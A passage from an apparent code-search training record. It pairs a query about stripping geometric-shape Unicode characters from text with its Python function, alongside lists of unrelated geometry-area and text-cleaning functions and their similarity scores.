0.5))", "def triangle_area(triangle):\n # sides of the triangle\n a = great_circle_distance(triangle[0], triangle[1])\n b = great_circle_distance(triangle[0], triangle[2])\n c = great_circle_distance(triangle[1], triangle[2])\n\n # it may happen that the triangle is degenerate\n # for the rare case where a fourth generator just\n # touches the circumcircle\n assert a >= 0.\n assert b >= 0.\n assert c >= 0.\n\n s = (a + b + c) / 2.\n\n # does not quite work for extra large polygons\n # where area is ambiguous\n try:\n return 4. * arctan(sqrt(tan(s / 2.) *\n tan((s - a) / 2.) *\n tan((s - b) / 2.) *\n tan((s - c) / 2.)))\n except FloatingPointError:\n # floating point weirdness\n return 0.", "def test_circumference_area(self):\n self.assertEqual(9.425, circumference_area(self.values['radius']))", "def cone_area(radius: number, height: number) -> number:\n return pi*radius*(radius + sqrt(radius**2 + height**2))", "def _area(bounds):\n return (bounds[0, 1] - bounds[0, 0]) * (bounds[1, 1] - bounds[1, 0])", "def area(self):\n area = 0.25*self._sides*self._length**2 / math.tan(math.radians(180/self._sides))\n return float('{:.2f}'.format(area))", "def area_equilat(side):\n\treturn side/2 * math.sqrt(side**2 - (side/2)**2)", "def area(self) -> torch.Tensor:\n box = self.tensor\n area = (box[:, 2] - box[:, 0]) * (box[:, 3] - box[:, 1])\n return area", "def area_polygon(polygon):\n o = centroid_points(polygon)\n u = subtract_vectors(polygon[-1], o)\n v = subtract_vectors(polygon[0], o)\n a = 0.5 * length_vector(cross_vectors(u, v))\n for i in range(0, len(polygon) - 1):\n u = v\n v = subtract_vectors(polygon[i + 1], o)\n a += 0.5 * length_vector(cross_vectors(u, v))\n return a", "def calculate_areas(polygon):\n project = ft.partial(pj.transform,\n pj.Proj(init='epsg:4326'),\n pj.Proj('+proj=eck4 +lat_0=' + str(polygon.centroid.y) + ' +lon_0=' + str(polygon.centroid.x)))\n field_projected = transform(project, polygon)\n # convert from square meters to acres\n return uom.Uom(field_projected.area, uom.SquareMeter)", "def pcw(coords):\n n = len(coords)\n xl = coords[0:n-1,0]\n yl = coords[1:,1]\n xr = coords[1:,0]\n yr = coords[0:n-1,1]\n a = xl*yl - xr*yr\n area = a.sum()\n if area < 0:\n return 1\n else:\n return 0", "def area_triangle_three_sides(side1: float, side2: float, side3: float) -> float:\r\n if side1 < 0 or side2 < 0 or side3 < 0:\r\n raise ValueError(\"area_triangle_three_sides() only accepts non-negative values\")\r\n elif side1 + side2 < side3 or side1 + side3 < side2 or side2 + side3 < side1:\r\n raise ValueError(\"Given three sides do not form a triangle\")\r\n semi_perimeter = (side1 + side2 + side3) / 2\r\n area = sqrt(\r\n semi_perimeter\r\n * (semi_perimeter - side1)\r\n * (semi_perimeter - side2)\r\n * (semi_perimeter - side3)\r\n )\r\n return area", "def compute_mesh_area_smart(mesh):\n mesh_surface_area = mesh.area\n return mesh_surface_area", "def area(self):\n return 0.5*np.abs(np.dot(self.x,np.roll(self.y,1))-np.dot(self.y,np.roll(self.x,1)))", "def cube_area(edge : number) -> number:\n area = 6*edge*edge\n\n return area", "def polygon_area(ppath): # pragma: no cover\n v_ = ppath.vertices\n if len(v_) < 3:\n return 0.0\n x_ = v_[:, 1] - v_[:, 1].mean()\n y_ = v_[:, 0] - v_[:, 0].mean()\n correction = x_[-1] * y_[0] - y_[-1] * x_[0]\n main_area = np.dot(x_[:-1], y_[1:]) - np.dot(y_[:-1], x_[1:])\n return 0.5 * np.abs(main_area + correction)", "def _triangle_area_at_points(self, p1, p2, p3):\n a = sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)\n b = sqrt((p2[0] - p3[0]) ** 2 + (p2[1] - p3[1]) ** 2)\n c = sqrt((p1[0] - p3[0]) ** 2 + (p1[1] - p3[1]) ** 2)\n s = (a + b + c) / float(2)\n area = sqrt(s * (s - a) * (s - b) * (s - c))\n return area", "def compute_area(boxes: Type[Union[Tensor, np.ndarray]]):\n if isinstance(boxes, Tensor):\n return compute_area_pt(boxes)\n return ((boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1]))", "def ext_surface_area(self, rho_p, d_p):\n ac = 6./(d_p*rho_p)\n return ac", "def area(triangles=None, crosses=None, sum=False):\n if crosses is None:\n crosses = cross(triangles)\n area = (np.sum(crosses**2, axis=1)**.5) * .5\n if sum:\n return np.sum(area)\n return area", "def triangle_area(base, height):\n return (base * height) / 2", "def area_triangle(w, h):\n return w * h / 2", "def area(x, y):\n return x*y/2", "def read_surf_area(self, conf_path):\n ct = os.path.join(conf_path, 'CONTCAR')\n \n with open(ct, 'r') as f:\n dat = f.readlines()[2:5]\n a1 = list(map(float, dat[0].strip().split()))\n a2 = list(map(float, dat[1].strip().split()))\n return np.linalg.norm(np.cross(a1, a2))", "def area(self):\n if isinstance(self.crs, GeographicalCRS):\n major_axis = self.crs.ellipsoid.a\n minor_axis = self.crs.ellipsoid.b\n\n area = 0.0\n if major_axis == minor_axis: # Sphere\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.spherical_area(major_axis, x1, y1, x2, y2)\n\n else:\n for seg in self.segment_tuples:\n x1, y1 = seg[0]\n x2, y2 = seg[1]\n area += geodesy.ellipsoidal_area(major_axis, minor_axis,\n x1, y1, x2, y2)\n\n else:\n # Cartesian coordinate systems\n x, y = self.coordinates\n x0 = np.min(x)\n area = (0.5*(x[0] + x[-1]) - x0) * (y[0] - y[-1])\n area += sum((0.5*(x[i+1]+x[i]) - x0) * (y[i+1] - y[i]) for i in range(len(x)-1))\n return abs(area) - sum(sub.area for sub in self.subs)", "def area(self):\n\t\t#print (self.radius*self.radius*math.pi)\n\t\tcircle_area = (self.radius*self.radius*math.pi)\n\t\treturn circle_area", "def triarea(a, b, c):\n return 0.5 * edist(a, b) * pdist(c, a, b)", "def regular_polygon_area(perimeter, apothem):\n return (perimeter * apothem) / 2", "def calculateDetectorArea(self):\n area = 0.0\n r = self.geoParam['CylinderLightGuideRadius']\n while(r + self.geoParam['DetectorThickness'] < self.geoParam['CylinderRadius']):\n area -= math.pow(r,2)\n r += self.geoParam['DetectorThickness']\n area += math.pow(r,2)\n r += self.geoParam['DetectorSpacing']\n return math.pi*area", "def getArea(self):\n asum = 0.0\n for quad in self._quadrilaterals:\n w = get_quad_width(quad)\n l = get_quad_length(quad)\n asum = asum + w * l\n return asum", "def surface_area_cuboid(length: float, breadth: float, height: float) -> float:\r\n if length < 0 or breadth < 0 or height < 0:\r\n raise ValueError(\"surface_area_cuboid() only accepts non-negative values\")\r\n return 2 * ((length * breadth) + (breadth * height) + (length * height))", "def rectangle_area(side1, side2):\n return float(side1) * float(side2)", "def surface_area(self):\n return self._surface_area", "def test_triangle_area(self):\n self.assertEqual(6, triangle_area(\n self.values['base'], self.values['height']))", "def test_triangle_positive_area(self):\n t = Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023))\n self.assertEqual(t.area(1), 4.0,\n \"Test of Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023)).area(1),\\\n returned value != 4.0.\")\n self.assertEqual(t.area(), 4.013,\n \"Test of Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023)).area(1) failed,\\\n returned value != 4.013.\")\n self.assertEqual(t.area(6), 4.012568,\n \"Test of Triangle(Point(0, 3.1415), Point(2.7, 3), Point(3 ** 0.5, 6.023)).area(6) failed,\\\n returned value != 4.012568.\")", "def area(boxes):\n y_min, x_min, y_max, x_max = np.split(boxes, 4, axis=-1)\n return np.squeeze((y_max - y_min) * (x_max - x_min), [1])", "def face_areas(self, point):\n surface_metrics_bp = self.surface_metric_matrices(point)\n return gs.sqrt(gs.linalg.det(surface_metrics_bp))", "def km2_area(polygons):\n\n reprojected_polygons = [reproject(p) for p in polygons]\n return ops.cascaded_union(reprojected_polygons).area * 1e-6", "def calculate_area_ratio(gt_area, perf_area):\n return min(gt_area, perf_area) / max(gt_area, perf_area)", "def calculate_area(boxes):\n box_dimension = len(boxes.size())\n if (box_dimension == 1) and (boxes.size()[0] != 0):\n return (boxes[3] - boxes[1] + 1) * (boxes[2] - boxes[0] + 1)\n elif box_dimension == 2:\n return (boxes[:, 3] - boxes[:, 1] + 1) * (boxes[:, 2] - boxes[:, 0] + 1)\n else:\n return torch.tensor([])", "def area_triangle(triangle):\n return 0.5 * length_vector(normal_triangle(triangle, False))", "def getComponentArea(self, cold=False):\n from armi.reactor.blocks import Block # avoid circular import\n\n block = self.getAncestor(lambda c: isinstance(c, Block))\n return self.getComponentVolume(cold) / block.getHeight()\n # raise NotImplementedError(\"Cannot compute area of a sphere component.\")", "def test_polygon_area(self):\n\n # Create closed simple polygon (counter clock wise)\n P = numpy.array([[0, 0], [1, 0], [1, 1], [0, 1], [0, 0]])\n A = calculate_polygon_area(P)\n msg = 'Calculated area was %f, expected 1.0 deg^2' % A\n assert numpy.allclose(A, 1), msg\n\n # Create closed simple polygon (clock wise)\n P = numpy.array([[0, 0], [0, 1], [1, 1], [1, 0], [0, 0]])\n A = calculate_polygon_area(P)\n msg = 'Calculated area was %f, expected 1.0 deg^2' % A\n assert numpy.allclose(A, 1), msg\n\n A = calculate_polygon_area(P, signed=True)\n msg = 'Calculated signed area was %f, expected -1.0 deg^2' % A\n assert numpy.allclose(A, -1), msg\n\n # Not starting at zero\n # Create closed simple polygon (counter clock wise)\n P = numpy.array([[168, -2], [169, -2], [169, -1],\n [168, -1], [168, -2]])\n A = calculate_polygon_area(P)\n\n msg = 'Calculated area was %f, expected 1.0 deg^2' % A\n assert numpy.allclose(A, 1), msg\n\n # Realistic polygon\n filename = '%s/%s' % (TESTDATA, 'test_polygon.shp')\n layer = read_layer(filename)\n geometry = layer.get_geometry()\n\n P = geometry[0]\n A = calculate_polygon_area(P)\n\n # Verify against area reported by qgis (only three decimals)\n qgis_area = 0.003\n assert numpy.allclose(A, qgis_area, atol=1.0e-3)\n\n # Verify against area reported by ESRI ARC (very good correspondence)\n esri_area = 2.63924787273461e-3\n assert numpy.allclose(A, esri_area, rtol=0, atol=1.0e-10)", "def shaded_area(l):\n area = area_square(l) - area_circle(l)\n return area", "def test_area(self):\n s1 = Square(3)\n self.assertEqual(9, s1.area())\n s4 = Square(5, 0, 0, 12)\n self.assertEqual(25, s4.area())", "def test_square(self):\n result = shape_area.square_area(5)\n self.assertEqual(result,25)", "def verifyArea(self, w, h, square):\n valid_area = False\n area1 = w*h\n area2 = cv2.contourArea(cv2.convexHull(square))\n #print(\"w*h : {} contourArea: {}, ratio: {:.2f}\".format(area1, area2, area1/area2))\n if (((area1/area2) > 0.9) and ((area1/area2) < 1.1)):\n valid_area = True\n return valid_area", "def area(self, boxes):\n with tf.name_scope('area'):\n ymin, xmin, ymax, xmax = tf.unstack(boxes, axis=1)\n return (ymax - ymin) * (xmax - xmin)" ]
[ "0.72606695", "0.69087756", "0.6878328", "0.6759182", "0.66357255", "0.662495", "0.6603431", "0.6533843", "0.65235794", "0.6498596", "0.64894485", "0.643404", "0.64310247", "0.63980806", "0.63846767", "0.6348388", "0.6340205", "0.63149506", "0.62920696", "0.62676907", "0.62599206", "0.61904335", "0.6175555", "0.6149911", "0.6145471", "0.61437523", "0.61402535", "0.6133957", "0.6133523", "0.6132846", "0.613271", "0.61189765", "0.61102813", "0.6091487", "0.60729414", "0.60649896", "0.60512453", "0.6051182", "0.60500944", "0.6044575", "0.6043065", "0.6028307", "0.60252696", "0.6019837", "0.6011925", "0.600753", "0.5996481", "0.59947455", "0.5994655", "0.5977994", "0.5973249", "0.5969831", "0.5967895", "0.59624696", "0.5961604", "0.59525573", "0.5952098", "0.59287345", "0.59049517", "0.5884271", "0.58617485", "0.5857424", "0.58534455", "0.5850195", "0.58481765", "0.5840283", "0.5828231", "0.58273315", "0.58227015", "0.5816429", "0.58141124", "0.58119833", "0.58081806", "0.5801533", "0.5799247", "0.5785909", "0.5782337", "0.57772195", "0.5768827", "0.57600635", "0.5758808", "0.57573044", "0.5756956", "0.57558215", "0.5746036", "0.5742434", "0.57406455", "0.57256204", "0.5718095", "0.5714564", "0.5710754", "0.57096785", "0.57065845", "0.569674", "0.568983", "0.56863946", "0.56856906", "0.56854373", "0.56798464", "0.5679495" ]
0.6548548
7
Cleans the line from geometrical shape characters and replaces these with space.
def clean_text_from_geometrical_shape_unicode(line): line = re.sub(r"([\u25A0-\u25FF])", " ", line) return line
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def clean(line):\n line = line.strip('\\n').strip()\n line = line.replace('\\xe2\\x80\\x93', '-')\n line = line.replace('\\xe2\\x80\\x99', '\\'')\n\n return line", "def clean(line):\n line = line.lower().replace(\"\\n\",\" \").replace(\"\\r\",\"\").replace(',',\"\").replace(\">\",\"> \").replace(\"<\", \" <\").replace(\"|\",\" \")\n return line", "def prepare_text_line(line):\n\n re_sub = re.sub\n # FIXME: maintain the original character positions\n\n # strip whitespace\n line = line.strip()\n\n # strip comment markers\n # common comment characters\n line = line.strip('\\\\/*#%;')\n # un common comment line prefix in dos\n line = re_sub('^rem\\s+', ' ', line)\n line = re_sub('^\\@rem\\s+', ' ', line)\n # un common comment line prefix in autotools am/in\n line = re_sub('^dnl\\s+', ' ', line)\n # un common comment line prefix in man pages\n line = re_sub('^\\.\\\\\\\\\"', ' ', line)\n # un common pipe chars in some ascii art\n line = line.replace('|', ' ')\n\n # normalize copyright signs and spacing aournd them\n line = line.replace('(C)', ' (c) ')\n line = line.replace('(c)', ' (c) ')\n # the case of \\251 is tested by 'weirdencoding.h'\n line = line.replace(u'\\251', u' (c) ')\n line = line.replace('&copy;', ' (c) ')\n line = line.replace('&#169;', ' (c) ')\n line = line.replace('&#xa9;', ' (c) ')\n line = line.replace(u'\\xa9', ' (c) ')\n # FIXME: what is \\xc2???\n line = line.replace(u'\\xc2', '')\n\n # TODO: add more HTML entities replacements\n # see http://www.htmlhelp.com/reference/html40/entities/special.html\n # convert html entities &#13;&#10; CR LF to space\n line = line.replace(u'&#13;&#10;', ' ')\n line = line.replace(u'&#13;', ' ')\n line = line.replace(u'&#10;', ' ')\n\n # normalize (possibly repeated) quotes to unique single quote '\n # backticks ` and \"\n line = line.replace(u'`', \"'\")\n line = line.replace(u'\"', \"'\")\n line = re.sub(MULTIQUOTES_RE(), \"'\", line)\n # quotes to space? but t'so will be wrecked\n # line = line.replace(u\"'\", ' ')\n\n # some trailing garbage ')\n line = line.replace(\"')\", ' ')\n\n\n # note that we do not replace the debian tag by a space: we remove it\n line = re_sub(DEBIAN_COPYRIGHT_TAGS_RE(), '', line)\n\n line = re_sub(IGNORED_PUNCTUATION_RE(), ' ', line)\n\n # tabs to spaces\n line = line.replace('\\t', ' ')\n\n # normalize spaces around commas\n line = line.replace(' , ', ', ')\n\n # remove ASCII \"line decorations\"\n # such as in --- or === or !!! or *****\n line = re_sub(ASCII_LINE_DECO_RE(), ' ', line)\n line = re_sub(ASCII_LINE_DECO2_RE(), ' ', line)\n\n # Replace escaped literal \\0 \\n \\r \\t that may exist as-is by a space\n # such as in code literals: a=\"\\\\n some text\"\n line = line.replace('\\\\r', ' ')\n line = line.replace('\\\\n', ' ')\n line = line.replace('\\\\t', ' ')\n line = line.replace('\\\\0', ' ')\n\n # TODO: Why?\n # replace contiguous spaces with only one occurrence\n # line = re.sub(WHITESPACE_RE(), ' ', text)\n\n # normalize to ascii text\n line = commoncode.text.toascii(line)\n # logger.debug(\"ascii_only_text: \" + text)\n\n # strip verbatim back slash and comment signs again at both ends of a line\n # FIXME: this is done at the start of this function already\n line = line.strip('\\\\/*#%;')\n\n # normalize to use only LF as line endings so we can split correctly\n # and keep line endings\n line = commoncode.text.unixlinesep(line)\n # why?\n line = lowercase_well_known_word(line)\n\n return line", "def removeSingleChars(self) -> None:\n self.text = re.sub('\\s[^\\n\\s]\\s', ' ', self.text)", "def clean(text):\n new = text.replace(\"\\r\", \"\")\n new = new.replace(\"\\t\", \"\")\n new = new.replace(\"\\n\", \"\")\n new = new.replace(\"- \", \"-\")\n new = new.replace(\" \", \" \")\n return new", "def quote( self, aLine ):\n clean= aLine\n for from_, to_ in self.quoted_chars:\n clean= clean.replace( from_, to_ )\n return clean", "def remove_arrows(line):\n pattern = r'[\\+\\-][0-9]+'\n if type(line) != str:\n if (pd.isnull(line) == True) | (np.isnan(line) == True):\n return 'NaN'\n else:\n return line\n else:\n line = re.search(pattern, line)\n return line[0]", "def edit_google_vision_text(self,text):\n s1=text\n try:\n log_info(\"Correcting google vision text to remove extra spacing\",MODULE_CONTEXT)\n i=0\n while(i<len(text)):\n s1=text\n if text[i] in [\"/\",\"।\",'।' ,':','|',\",\" ,'०',\"]\",\"-\",\")\",\"}\"] and text[i-1]==\" \": \n text=text[:i-1]+text[i:]\n if i > 0 :\n if text[i-1] in [\"-\",\"[\",\"{\",\"/\",\"(\"] and text[i]==\" \":\n text=text[:i]+text[i+1:]\n elif text[i] in [\"-\",\"[\",\"{\",\"/\",\"(\"] and text[i+1]==\" \":\n text=text[:i+1]+text[i+2:]\n i=i+1\n except Exception as e:\n log_exception(\"Exception while correcting google vision text\", MODULE_CONTEXT, e)\n return s1\n return text", "def clean_line(self, line):\n\n if \"#\" in line:\n temp = line.split(\"#\")\n if len(temp) < 2:\n return \"\"\n else:\n temp = temp[0] + \"\\n\"\n\n # make sure the \"#\" isn't in quotes\n if temp.count(\"\\\"\") % 2 == 0:\n line = temp\n\n line = line.replace(\"}\", \" } \").replace(\"{\", \" { \")\n while \"=\" in line:\n line = self.replace_equals(line)\n line = line.lstrip()\n return line", "def remove_space(line):\n split_line = line.split()\n return \"\".join(split_line)", "def clean_line(line, normNum=True, normProf=True):\n\n # Remove square brackets, ceiling characters, question marks, other\n # questionable characters, and line breaks\n line = re.sub(r'(\\[|\\])', '', line)\n line = re.sub(r'(⌈|⌉)', '', line)\n line = re.sub(r'( / )', ' ', line)\n line = re.sub(r'/', '', line)\n line = re.sub(r'\\?', '', line)\n line = re.sub(r'([<]|[>])+', '', line)\n line = re.sub(r'!', '', line)\n line = re.sub(r'\"', '', line)\n\n # Remove researcher's notes, and multiple dashes or '='s\n line = re.sub(r'(\\(.*\\))', '', line)\n line = re.sub(r'(#[.]*)', '', line)\n line = re.sub(r'[-]{2}', '', line)\n line = re.sub(r'[=]{2}', '', line)\n\n # Replace numbers with 'number'\n if normNum is True:\n line = re.sub(r'\\b(?<!-)(\\d+)(?![\\w-])', 'number', line)\n line = re.sub(r'[-+]?\\b\\d+\\b', 'number', line)\n\n #line = re.sub(r'\\b([\\-\\.0-9]+)(?![\\w-])', 'number', line)\n\n # Replace professions with 'profession'\n if normProf is True:\n line = professions.replaceProfessions(line)\n\n # Remove blank character at end of line\n linelength = len(line)\n if (linelength > 0 and line[linelength-1] == \"\"):\n del line[0:linelength-2]\n\n return line", "def squash_crs(string):\n if isinstance(string, str):\n return re.sub('\\n[^\\n]+\\r', '\\n', string)\n else:\n return re.sub(b'\\n[^\\n]+\\r', b'\\n', string)", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def clean_text_from_private_unicode(line):\n line = re.sub(r\"([\\uE000-\\uF8FF]|\\uD83C[\\uDF00-\\uDFFF]|\\uD83D[\\uDC00-\\uDDFF])\", \" \", line)\n return line", "def __stripEol(self, txt):\n return txt.replace(\"\\r\", \"\").replace(\"\\n\", \"\")", "def _chop_end_codes(line):\n return re.sub(r\"\\s\\s\\s\\s+[\\w]{4}.\\s+\\d*\\Z\", \"\", line)", "def clean_smile(self, smi):\n smi = smi.replace('\\n', '')\n return smi", "def cleanData(rawData):\n\trawData = re.sub(r'R-LRB- \\(', r'R-LRB- -LRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\)', r'R-RRB- -RRB-', rawData)\n\trawData = re.sub(r'R-RRB- \\(', r'R-RRB- -LRB-', rawData)\n\trawData = re.sub(r'-LRB- \\(', r'-LRB- -LRB-', rawData)\n\trawData = re.sub(r'-RRB- \\)', r'-RRB- -RRB-', rawData)\n\trawData = re.sub(r'PU \\(', r'PU -LRB-', rawData)\n\trawData = re.sub(r'PU \\)', r'PU -RRB-', rawData)\n\trawData = re.sub(r':-\\)', r'smileyface', rawData)\n\n\treturn rawData", "def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text", "def unlines(line):\n\n return line.translate(str.maketrans('\\n', ' '))", "def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text", "def strip_other_charcter():\n pass", "def process_line(line:str) -> str:\n s = replace_multispace(replace_newlines(line))\n return s", "def __cleanText(self,stripNonAlphaNumeric=False, stripNumbers=False):\n if stripNonAlphaNumeric:\n txt = r1.sub(\" \",self.getRawText() )\n else:\n txt = self.getRawText()\n # clean up white spaces\n txt = r2.sub(\" \",txt)\n if stripNumbers:\n txt = r3.sub(\"\",txt)\n self.graph[\"__txt\"] = txt\n self.graph[\"__scope\"] = (0,len(txt))", "def clean_whitespace(text):\n return text\n #return re.sub(r'\\r\\n|\\n', \"\\t\", text)", "def replace_spaces_with_pluses(self, sample):\r\n changed = list(sample)\r\n for i, c in enumerate(changed):\r\n if(c == ' ' or c ==' ' or c ==' ' or c=='\\n' or c=='\\n\\n'):\r\n changed[i] = '+'\r\n return ''.join(changed)", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def clean_text(text):\n return text.replace('\\n', ' ').replace('\\r', ' ')", "def cleaning(string):\n\n if type(string) == float or type(string) == int:\n return string\n res = ''\n if string != string:\n return string\n string = string.replace(\"\\\\r\", \"\")\n string = string.replace(\"\\\\n\", \"\")\n string = string.replace(\"\\\\b\", \"\")\n string = string.replace(\"\\\\t\", \"\")\n for i in string:\n if i.isalpha():\n res = res + i\n return res.lower()", "def f_shp(i):\n return i.replace('(', '').replace(')', '').replace(', ', 'x').replace(',', '')", "def _chop_end_misc(line):\n return re.sub(r\"\\s+\\d\\d-\\w\\w\\w-\\d\\d\\s+[1-9][0-9A-Z]{3}\\s*\\Z\", \"\", line)", "def test__clean_line():\n LINES = {\n \"One morn before me were three figures seen,\":\n \"One morn before me were three figures seen,\",\n \"And once—more came they by:-alas! wherefore?\":\n \"And once more came they by: alas! wherefore?\",\n }\n for line, clean_line in LINES.items():\n assert(LineBuilder(line)._clean_line() == clean_line)", "def strip_rule(line):\n\n return \" \".join(line.split())", "def strip_space():\n pass", "def remove_bad_characters(self):\n\n self.categorie_name = self.categorie_name.replace(\"\\n\", \"\")", "def fix_ending(x):\n x = strip_stoich_wrapper(x)\n x = re.sub(r'(?<=[a-zA-Z])\\-(?=[a-zA-Z]$)', ' ', x)\n return x", "def _clean(self, string):\n return re.sub('\\s+', ' ', string).strip()", "def clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def clean_line(line: str) -> str:\n tokens = re.sub('[^a-z0-9 ]+', ' ', line.lower()).split(' ')\n stemmed_tokens = [w for w in tokens if len(w) > 2]\n return ' '.join(stemmed_tokens)", "def removeApostrophesLine(self, wordLines):\n\t\treturn self._doPerLine(wordLines, self.removeApostrophes)", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def CleanLineEndings(aLine):\n str = aLine.replace(cr, \"\") # remove cr\n str = str.replace(lf, \"\") # remove lf\n return str", "def preprocess(x):\n\n\tres = re.sub(r'[^\\w\\s]', '', x)\n\tres = res.strip('\\n')\n\n\treturn res", "def replace_id_with_symbol(self, line):\n new_line = self._pattern.sub(lambda x: self._mapping[x.group()], line)\n if line != new_line:\n self._set_leading_whitespace(new_line)\n line = self._check_line_length(new_line)\n self._reset_leading_whitespace()\n\n return line", "def normalizeVerseBreak(string):\n string = string.strip()\n string = re.sub('\\s+/\\s?', '/', string)\n string = string.replace('/', ' / ')\n return string", "def _get_whitespace(line):\n return line[:-len(line.lstrip())]", "def remove_linebreaks(self, text):\n return re.sub(ur\"\\n(?!(\"\n u\"DZIAŁ [IVXLC]|\"\n u\"Rozdział [IVXLC1-9]|\"\n u\"Art\\.|\"\n u\"§ \\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\.|\"\n u\"\\d+[a-z]*\\)|\"\n u\"[a-z]+\\)|\"\n u\"–))\", \" \", text)", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet", "def scratch(line):\n if line.count('~~') >= 2:\n for i in range(0, line.count('~~') - line.count('~~') % 2):\n if i % 2 == 0:\n line = line.replace('~~', '<del>', 1)\n else:\n line = line.replace('~~', '</del>', 1)\n return line", "def clean_text(text):\n text = text.replace(\"\\uf0b7\", \" \")\n text = text.replace(\":\", \" \")\n text = text.replace(\".\", \" \")\n text = text.replace(\",\", \" \")\n text = text.replace(\"/\", \" \")\n text = text.replace(\"(\", \" \")\n text = text.replace(\")\", \" \")\n text = text.replace(\"[\", \" \")\n text = text.replace(\"]\", \" \")\n text = text.replace(\"+\", \" \")\n text = text.replace(\"?\", \" \")\n text = text.replace(\"*\", \" \")\n text = text.replace(\"#\", \" \")\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n text = re.sub(\" $\", \"\", text)\n return text", "def strip_warnings(self, line):\n if line[0] == \"|\":\n return \"\"\n else:\n return line", "def small_preprocess_singlerow(data):\r\n # Remove new line characters\r\n data = re.sub('\\s+', ' ', data) \r\n # Remove distracting single quotes\r\n data = re.sub(\"\\'\", \"\", data)\r\n\r\n return data", "def clear_line(string):\n for character in string:\n #backtrack-whitespace-backtrack\n sys.stdout.write(\"\\b \\b\")", "def pre_process_line(self, line):\n\n line = line.lower()\n line = line.translate(co.NORM_TABLE)\n line = line.translate(co.PUNC_TABLE)\n line = line.split()\n line = line[self.configs[\"resources\"][self.resource_type][\"lstrip\"]:]\n if self.configs[\"resources\"][self.resource_type][\"rstrip\"]:\n line = line[:-self.configs[\"resources\"][self.resource_type][\"rstrip\"]]\n return \" \".join(line)", "def remove_nonspacing_marks(string):\n return ''.join(c for c in unicodedata.normalize('NFKD', string) if unicodedata.category(c) !='Mn')", "def sanitize_spacers(\n raw_signal_array,\n set_of_spacer_marks\n ):\n # Force spacer marks\n for spacer_index in set_of_spacer_marks:\n raw_signal_array[spacer_index] = '|';\n return raw_signal_array", "def cleanSents(row, field):\n\n text = str(row[field]).lower()\n clean_text = re.sub('[^A-Za-z0-9]+', ' ', text).strip()\n return clean_text", "def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text", "def _removeWhitespaces(self, s):\n return s.translate({ord(c): None for c in string.whitespace})", "def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text", "def clean_text(text):\n return(re.sub(\" {2,}|\\r|\\n\",\"\", text))", "def del_whitespace(selfs, text):\n\t\treturn text.replace(' ', '')", "def process_line(line_str):\n punctuation = [',', ':', ')']\n for mark in punctuation:\n line_str = line_str.replace(mark, ' ')\n line_str = line_str.replace('(', '')\n line_str = line_str.replace('III', '3').replace('II', '2').replace(' I ', '1')\n words = [w for w in line_str.split(' ') if w != '']\n return words", "def CLEAN(text):\n return _control_char_re.sub('', text)", "def RemoveNonUtf8BadChars(line):\n return \"\".join([ch for ch in line if ch in printable])", "def lowerPen(gcode):\r\n gcode.append(\"M300 S43\")\r\n #gcode.append(\"G0 Z0\")\r", "def formClean(s):\n s = s.replace('\"',\"'\")\n s = s.replace(\"\\n\",\" \")\n return s", "def clean_text_for_skill_extraction(text):\n multi_space_regex = re.compile(r\"[,;?!()\\\\/]\", re.IGNORECASE)\n text = re.sub(multi_space_regex, ' ', text)\n\n text = clean_text_from_private_unicode(text)\n text = clean_text_from_geometrical_shape_unicode(text)\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n return text", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def _remove_special_chars(sentence, replace_with=\"\"):\n sentence = sentence.replace('\\n', replace_with).replace('\\t', replace_with)\n return sentence", "def squeeze(value):\r\n return 